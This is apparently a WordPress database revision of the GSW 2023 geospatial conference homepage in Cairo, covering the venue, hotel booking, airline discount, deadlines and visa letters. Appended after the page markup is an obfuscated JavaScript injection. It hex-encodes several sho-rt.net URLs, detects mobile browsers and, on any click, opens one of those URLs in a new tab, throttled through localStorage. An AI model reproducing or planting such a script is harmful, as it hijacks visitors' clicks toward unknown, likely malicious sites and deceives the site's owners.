/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:49:51','2023-06-14 10:49:51','',3066,'https://gsw2023.com/?p=4700',0,'revision','',0),
